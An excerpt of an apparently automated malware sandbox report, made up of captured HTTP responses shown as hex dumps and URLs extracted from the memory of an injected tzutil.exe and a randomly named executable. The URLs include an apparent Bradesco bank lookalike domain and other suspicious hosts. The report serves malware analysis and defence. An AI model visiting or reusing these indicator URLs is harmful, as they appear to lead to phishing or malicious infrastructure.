74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:31:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4adce-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:31:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4adce-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:31:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4adce-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:31:38 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4adce-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:31:40 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4adce-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:31:53 GMTContent-Type: text/htmlContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:32:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66e7a146-8ac0"Content-Encoding: gzipData Raw: 32 37 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 14 47 92 e8 e7 c1 6c ff 43 4e 6b 66 1b cc d4 47 56 d6 29 a0 d7 10 42 f3 d6 de be 79 f3 76 67 cd 76 6d 6d 0d cb 23 f2 be 33 eb d4 ca ac 1b 04 34 d0 5c c3 2d 5a 5c 02 81 0e 1a 10 08 9a 6e 10 ff 45 d3 59 55 fd 49 7f e1 79 64 64 55 65 d6 d1 5d d5 dd 68 c6 76 16 21 2a 8f c8 38 3c dc 3d dc 3d 3c dc 77 ed fb f5 47 ff f7 e0 1f ff fd 0f 87 28 d9 37 f4 99 5d fb f0 0f a5 b3 a6 b4 7f ac 26 4f f0 e6 18 7e 86 58 01 7e 0c e4 b3 14 2f b3 ae 87 fc fd 63 45 5f 9c c8 e3 b7 e1 63 d9 f7 ed 09 e4 14 95 d2 fe b1 7f 9b f8 d7 03 13 07 2d c3 66 7d 85 d3 d1 18 c5 5b a6 8f 4c f8 e6 1f 0f ed 47 82 84 da 5f 99 ac 81 f6 8f b9 c8 14 90 8b dc 58 c1 32 e2 34 c5 ef 2a 57 52 50 d9 b6 5c 3f 5e 4e 11 7c 79 bf 80 4a 0a 8f 26 ca f8 e6 7d 4a 31 15 5f 61 f5 09 8f 67 75 b4 9f 9e 9c ee db c9 3f 1c f8 dd a1 89 43 bf ff e3 a1 7f 8e 55 f7 cf a8 84 58 fd 8f 2e 6b 7a bb 3f 2a ba d0 7f cb dc 3f fd 7e f8 00 2a 85 1b 7a 0f ae cd 57 7c 1d cd fc fd 7b 95 3c 9d 3b b4 17 7e 33 4c e6 00 fe cd 1e 4c e7 f6 4e c0 45 ee d0 87 1f e3 07 e9 43 d3 e1 8b cc 01 86 26 f7 99 69 fc 9b fb 30 75 30 7a 1f de 67 d2 07 c3 f7 b9 54 fa e0 de 7d 53 a4 81 08 b6 04 4a 1a aa 96 2d 57 f0 62 dd 85 f2 dd 1d c8 7c 58 c8 87 f5 7c 9c 09 eb cb d0 d9 4c f8 cb 1c 62 12 cf 73 e9 e9 bd ef f7 a9 20 1c 01 3c cf 1e 62 c2 8a b2 a9 e9 70 20 ad 8a b3 70 d1 53 71 bf 8a ba 3f c8 7f f8 51 08 89 f4 c7 87 48 cf 32 a9 16 84 08 44 a2 1e e7 0e 7c 54 d8 cb da 76 d7 e4 0b c8 e3 5d c5 c6 93 b0 83 10 c8 4c ff 16 ba 54 28 14 b2 64 8c 1f 13 e0 1d 3a 90 c2 f7 79 26 5f e8 0b a4 91 a0 0c 15 b5 67 a3 05 f5 cc a1 5c 38 1d 19 e6 63 32 0d 1b d6 f8 7e 3f f8 6e 69 a2 70 93 29 26 1a 6c 81 cc c7 a1 7c 78 5f c8 e4 c2 f9 c8 e6 68 32 e1 cc 47 64 9e 0e 66 42 0c ca a6 68 02 9c 0c c1 a8 fc 87 07 c8 fb 14 1d 02 0b 86 44 ea a1 0f 86 08 94 61 3e 0a ef d3 51 fd b9 c2 a1 a8 fe 7c f8 5d 36 37 1d 22 52 36 93 26 f5 66 f3 e9 f0 9e 39 40 48 29 f3 e1 47 1b 02 bf 85 89 a3 22 16 b4 91 a7 3f 0e db ca a4 0a 1f 46 7d 0c c9 38 9f 4e 85 63 2d 4c a7 42 9c 04 ea 25 b8 59 38 f8 51 f8 fc c0 47 11 82 1c 4a f4 3d fd f1 74 44 dd 74 d4 f7 7c 04 03 3a 84 01 33 3d 9d da db 85 d0 6c d1 97 ad 04 cf 2b 97 27 59 c1 50 4c ae 58 9d e4 4d ea 7f d3 39 fc 89 ae 98 1a e5 22 7d ff 98 e7 57 75 e4 c9 08 01 07 f4 ab 36 70 4e 1f 55 fc 29 de 03 9e 20 bb 48 c4 25 80 65 f1 f8 c9 94 ad 98 7e 11 b9 93 f8 ed d6 6b 09 9b 8c ea d8 45 51 bb f6 11 22 24 cd 87 ad ab 6c 89 8d 1e 7a 2e bf 1f 38 17 6b d5 e4 22 6b 4e aa 1e 35 f3 77 bb f6 4d 91 b7 33 fb a6 c8 32 42 c1 9f 7d 9c 25 54 29 45 d8 3f a6 00 eb af 1c e6 ac ca 61 45 80 7e ee da f7 eb 89 09 0a 17 44 2e c5 21 49 31 27 26 66 a0 d9 e8 09 fe 42 94 33 bc 35 41 1e 84 5f 08 4a 89 e2 75 d6 f3 f6 8f 21 57 ab 09 ba 52 b6 4a 94 6f 61 0e 12 36 16 2f 20 95 cb a6 67 6a 29 3d 5c 94 58 c5 84 65 87 14 a3 c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:32:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66e7a146-8ac0"Content-Encoding: gzipData Raw: 32 37 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 14 47 92 e8 e7 c1 6c ff 43 4e 6b 66 1b cc d4 47 56 d6 29 a0 d7 10 42 f3 d6 de be 79 f3 76 67 cd 76 6d 6d 0d cb 23 f2 be 33 eb d4 ca ac 1b 04 34 d0 5c c3 2d 5a 5c 02 81 0e 1a 10 08 9a 6e 10 ff 45 d3 59 55 fd 49 7f e1 79 64 64 55 65 d6 d1 5d d5 dd 68 c6 76 16 21 2a 8f c8 38 3c dc 3d dc 3d 3c dc 77 ed fb f5 47 ff f7 e0 1f ff fd 0f 87 28 d9 37 f4 99 5d fb f0 0f a5 b3 a6 b4 7f ac 26 4f f0 e6 18 7e 86 58 01 7e 0c e4 b3 14 2f b3 ae 87 fc fd 63 45 5f 9c c8 e3 b7 e1 63 d9 f7 ed 09 e4 14 95 d2 fe b1 7f 9b f8 d7 03 13 07 2d c3 66 7d 85 d3 d1 18 c5 5b a6 8f 4c f8 e6 1f 0f ed 47 82 84 da 5f 99 ac 81 f6 8f b9 c8 14 90 8b dc 58 c1 32 e2 34 c5 ef 2a 57 52 50 d9 b6 5c 3f 5e 4e 11 7c 79 bf 80 4a 0a 8f 26 ca f8 e6 7d 4a 31 15 5f 61 f5 09 8f 67 75 b4 9f 9e 9c ee db c9 3f 1c f8 dd a1 89 43 bf ff e3 a1 7f 8e 55 f7 cf a8 84 58 fd 8f 2e 6b 7a bb 3f 2a ba d0 7f cb dc 3f fd 7e f8 00 2a 85 1b 7a 0f ae cd 57 7c 1d cd fc fd 7b 95 3c 9d 3b b4 17 7e 33 4c e6 00 fe cd 1e 4c e7 f6 4e c0 45 ee d0 87 1f e3 07 e9 43 d3 e1 8b cc 01 86 26 f7 99 69 fc 9b fb 30 75 30 7a 1f de 67 d2 07 c3 f7 b9 54 fa e0 de 7d 53 a4 81 08 b6 04 4a 1a aa 96 2d 57 f0 62 dd 85 f2 dd 1d c8 7c 58 c8 87 f5 7c 9c 09 eb cb d0 d9 4c f8 cb 1c 62 12 cf 73 e9 e9 bd ef f7 a9 20 1c 01 3c cf 1e 62 c2 8a b2 a9 e9 70 20 ad 8a b3 70 d1 53 71 bf 8a ba 3f c8 7f f8 51 08 89 f4 c7 87 48 cf 32 a9 16 84 08 44 a2 1e e7 0e 7c 54 d8 cb da 76 d7 e4 0b c8 e3 5d c5 c6 93 b0 83 10 c8 4c ff 16 ba 54 28 14 b2 64 8c 1f 13 e0 1d 3a 90 c2 f7 79 26 5f e8 0b a4 91 a0 0c 15 b5 67 a3 05 f5 cc a1 5c 38 1d 19 e6 63 32 0d 1b d6 f8 7e 3f f8 6e 69 a2 70 93 29 26 1a 6c 81 cc c7 a1 7c 78 5f c8 e4 c2 f9 c8 e6 68 32 e1 cc 47 64 9e 0e 66 42 0c ca a6 68 02 9c 0c c1 a8 fc 87 07 c8 fb 14 1d 02 0b 86 44 ea a1 0f 86 08 94 61 3e 0a ef d3 51 fd b9 c2 a1 a8 fe 7c f8 5d 36 37 1d 22 52 36 93 26 f5 66 f3 e9 f0 9e 39 40 48 29 f3 e1 47 1b 02 bf 85 89 a3 22 16 b4 91 a7 3f 0e db ca a4 0a 1f 46 7d 0c c9 38 9f 4e 85 63 2d 4c a7 42 9c 04 ea 25 b8 59 38 f8 51 f8 fc c0 47 11 82 1c 4a f4 3d fd f1 74 44 dd 74 d4 f7 7c 04 03 3a 84 01 33 3d 9d da db 85 d0 6c d1 97 ad 04 cf 2b 97 27 59 c1 50 4c ae 58 9d e4 4d ea 7f d3 39 fc 89 ae 98 1a e5 22 7d ff 98 e7 57 75 e4 c9 08 01 07 f4 ab 36 70 4e 1f 55 fc 29 de 03 9e 20 bb 48 c4 25 80 65 f1 f8 c9 94 ad 98 7e 11 b9 93 f8 ed d6 6b 09 9b 8c ea d8 45 51 bb f6 11 22 24 cd 87 ad ab 6c 89 8d 1e 7a 2e bf 1f 38 17 6b d5 e4 22 6b 4e aa 1e 35 f3 77 bb f6 4d 91 b7 33 fb a6 c8 32 42 c1 9f 7d 9c 25 54 29 45 d8 3f a6 00 eb af 1c e6 ac ca 61 45 80 7e ee da f7 eb 89 09 0a 17 44 2e c5 21 49 31 27 26 66 a0 d9 e8 09 fe 42 94 33 bc 35 41 1e 84 5f 08 4a 89 e2 75 d6 f3 f6 8f 21 57 ab 09 ba 52 b6 4a 94 6f 61 0e 12 36 16 2f 20 95 cb a6 67 6a 29 3d 5c 94 58 c5 84 65 87 14 a3 c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:32:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66e7a146-8ac0"Content-Encoding: gzipData Raw: 32 37 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 14 47 92 e8 e7 c1 6c ff 43 4e 6b 66 1b cc d4 47 56 d6 29 a0 d7 10 42 f3 d6 de be 79 f3 76 67 cd 76 6d 6d 0d cb 23 f2 be 33 eb d4 ca ac 1b 04 34 d0 5c c3 2d 5a 5c 02 81 0e 1a 10 08 9a 6e 10 ff 45 d3 59 55 fd 49 7f e1 79 64 64 55 65 d6 d1 5d d5 dd 68 c6 76 16 21 2a 8f c8 38 3c dc 3d dc 3d 3c dc 77 ed fb f5 47 ff f7 e0 1f ff fd 0f 87 28 d9 37 f4 99 5d fb f0 0f a5 b3 a6 b4 7f ac 26 4f f0 e6 18 7e 86 58 01 7e 0c e4 b3 14 2f b3 ae 87 fc fd 63 45 5f 9c c8 e3 b7 e1 63 d9 f7 ed 09 e4 14 95 d2 fe b1 7f 9b f8 d7 03 13 07 2d c3 66 7d 85 d3 d1 18 c5 5b a6 8f 4c f8 e6 1f 0f ed 47 82 84 da 5f 99 ac 81 f6 8f b9 c8 14 90 8b dc 58 c1 32 e2 34 c5 ef 2a 57 52 50 d9 b6 5c 3f 5e 4e 11 7c 79 bf 80 4a 0a 8f 26 ca f8 e6 7d 4a 31 15 5f 61 f5 09 8f 67 75 b4 9f 9e 9c ee db c9 3f 1c f8 dd a1 89 43 bf ff e3 a1 7f 8e 55 f7 cf a8 84 58 fd 8f 2e 6b 7a bb 3f 2a ba d0 7f cb dc 3f fd 7e f8 00 2a 85 1b 7a 0f ae cd 57 7c 1d cd fc fd 7b 95 3c 9d 3b b4 17 7e 33 4c e6 00 fe cd 1e 4c e7 f6 4e c0 45 ee d0 87 1f e3 07 e9 43 d3 e1 8b cc 01 86 26 f7 99 69 fc 9b fb 30 75 30 7a 1f de 67 d2 07 c3 f7 b9 54 fa e0 de 7d 53 a4 81 08 b6 04 4a 1a aa 96 2d 57 f0 62 dd 85 f2 dd 1d c8 7c 58 c8 87 f5 7c 9c 09 eb cb d0 d9 4c f8 cb 1c 62 12 cf 73 e9 e9 bd ef f7 a9 20 1c 01 3c cf 1e 62 c2 8a b2 a9 e9 70 20 ad 8a b3 70 d1 53 71 bf 8a ba 3f c8 7f f8 51 08 89 f4 c7 87 48 cf 32 a9 16 84 08 44 a2 1e e7 0e 7c 54 d8 cb da 76 d7 e4 0b c8 e3 5d c5 c6 93 b0 83 10 c8 4c ff 16 ba 54 28 14 b2 64 8c 1f 13 e0 1d 3a 90 c2 f7 79 26 5f e8 0b a4 91 a0 0c 15 b5 67 a3 05 f5 cc a1 5c 38 1d 19 e6 63 32 0d 1b d6 f8 7e 3f f8 6e 69 a2 70 93 29 26 1a 6c 81 cc c7 a1 7c 78 5f c8 e4 c2 f9 c8 e6 68 32 e1 cc 47 64 9e 0e 66 42 0c ca a6 68 02 9c 0c c1 a8 fc 87 07 c8 fb 14 1d 02 0b 86 44 ea a1 0f 86 08 94 61 3e 0a ef d3 51 fd b9 c2 a1 a8 fe 7c f8 5d 36 37 1d 22 52 36 93 26 f5 66 f3 e9 f0 9e 39 40 48 29 f3 e1 47 1b 02 bf 85 89 a3 22 16 b4 91 a7 3f 0e db ca a4 0a 1f 46 7d 0c c9 38 9f 4e 85 63 2d 4c a7 42 9c 04 ea 25 b8 59 38 f8 51 f8 fc c0 47 11 82 1c 4a f4 3d fd f1 74 44 dd 74 d4 f7 7c 04 03 3a 84 01 33 3d 9d da db 85 d0 6c d1 97 ad 04 cf 2b 97 27 59 c1 50 4c ae 58 9d e4 4d ea 7f d3 39 fc 89 ae 98 1a e5 22 7d ff 98 e7 57 75 e4 c9 08 01 07 f4 ab 36 70 4e 1f 55 fc 29 de 03 9e 20 bb 48 c4 25 80 65 f1 f8 c9 94 ad 98 7e 11 b9 93 f8 ed d6 6b 09 9b 8c ea d8 45 51 bb f6 11 22 24 cd 87 ad ab 6c 89 8d 1e 7a 2e bf 1f 38 17 6b d5 e4 22 6b 4e aa 1e 35 f3 77 bb f6 4d 91 b7 33 fb a6 c8 32 42 c1 9f 7d 9c 25 54 29 45 d8 3f a6 00 eb af 1c e6 ac ca 61 45 80 7e ee da f7 eb 89 09 0a 17 44 2e c5 21 49 31 27 26 66 a0 d9 e8 09 fe 42 94 33 bc 35 41 1e 84 5f 08 4a 89 e2 75 d6 f3 f6 8f 21 57 ab 09 ba 52 b6 4a 94 6f 61 0e 12 36 16 2f 20 95 cb a6 67 6a 29 3d 5c 94 58 c5 84 65 87 14 a3 c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:32:09 GMTContent-Type: text/htmlContent-Length: 35520Connection: closeVary: Accept-EncodingETag: "66e7a146-8ac0"Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 63 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 41 47 45 2d 45 4e 54 45 52 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 76 65 61 6c 54 72 61 6e 73 28 44 75 72 61 74 69 6f 6e 3d 30 2c 54 72 61 6e 73 69 74 69 6f 6e 3d 31 29 22 3e 0a 3c 74 69 74 6c 65 3e 26 23 78 38 31 37 45 3b 26 23 78 35 33 35 41 3b 26 23 78 36 43 34 37 3b 2d 26 23 78 37 45 42 46 3b 26 23 78 34 45 30 41 3b 26 23 78 35 41 33 31 3b 26 23 78 34 45 35 30 3b 26 23 78 37 42 32 43 3b 26 23 78 34 45 30 30 3b 26 23 78 35 34 43 31 3b 26 23 78 37 32 34 43 3b 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 78 38 31 37 45 3b 26 23 78 35 33 35 41 3b 26 23 78 35 42 39 38 3b 26 23 78 37 46 35 31 3b 26 23 78 35 31 36 35 3b 26 23 78 35 33 45 33 3b 26 23 78 37 46 35 31 3b 26 23 78 35 37 34 30 3b 2c 26 23 78 38 31 37 45 3b 26 23 78 35 33 35 41 3b 26 23 78 36 43 34 37 3b 26 23 78 36 45 33 38 3b 26 23 78 36 32 30 46 3b 26 23 78 35 42 39 38 3b 26 23 78 36 35 42 39 3b 26 23 78 35 31 36 35 3b 26 23 78 35 33 45 33 3b 2c 26 23 78 38 31 37 45 3b 26 23 78 35 33 35 41 3b 26 23 78 35 42 39 38 3b 26 23 78 36 35 42 39 3b 26 23 78 38 42 44 41 3b 26 23 78 34 46 45 31 3b 26 23 78 35 35 32 46 3b 26 23 78 34 45 30 30 3b 26 23 78 37 46 35 31 3b 26 23 78 37 41 44 39 3b 61 70 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 78 38 31 37 45 3b 26 23 78 35 33 35 41 3b 26 23 78 35 42 39 38 3b 26 23 78 37 46 35 31 3b 26 23 78 35 31 36 35 3b 26 23 78 35 33 45 33 3b 26 23 78 37 46 35 31 3b 26 23 78 35 37 34 30 3b 35 30 25 26 23 78 39 39 39 36 3b 26 23 78 35 42 46 38 3b 26 23 78 37 45 41 32 3b 26 23 78 38 33 38 39 3b 2c 26 23 78 38 31 37 45 3b 26 23 78 35 33 35 41 3b 26 23 78 35 42 39 38 3b 26 23 78 37 46 35 31 3b 26 23 78 35 31 36 35 3b 26 23 78 35 33 45 33 3b 26 23 78 37 46 35 31 3b 26 23 78 35 37 34 30 3b 26 23 78 37 46 35 31 3b 26 23 78 35 37 34 30 3b 2c 26 23 78 35 45 37 33 3b 26 23 78 35 33 46 30 3b 2c 26 23 78 35 42 39 38 3b 26 23 78 37 46 35 31 3b 26 23 78 35 31 36 35 3b 26 23 78 35 33 45 33 3b

Source: tzutil.exe, 00000006.00000002.4511343787.0000000005C92000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.adminbuy.cn
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.000000000348C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.clientebradesco.online/wouj?gp=1&js=1&uuid=1728484186.0038568114&other_args=eyJ1cmkiOiAiL
Source: tzutil.exe, 00000006.00000002.4511343787.0000000005C92000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.gohoamc.com/upload/image/20180828/20180828173727_41346.jpg)
Source: GxqFOvQfqyr.exe, 00000007.00000002.4512495754.0000000004EF3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.yjsdhy.top
Source: GxqFOvQfqyr.exe, 00000007.00000002.4512495754.0000000004EF3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.yjsdhy.top/tsl3/
Source: GxqFOvQfqyr.exe, 00000007.00000002.4510820390.000000000348C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.clientebradesco.online/
Source: GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://yjsdhy.top
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tzutil.exe, 00000006.00000002.4511343787.0000000005C92000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://beian.miit.gov.cn/
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tzutil.exe, 00000006.00000002.4511343787.0000000005326000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000003C66000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://imagecdn.gaopinimages.com/133139509333.jpg)
Source: tzutil.exe, 00000006.00000002.4509911861.00000000033DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
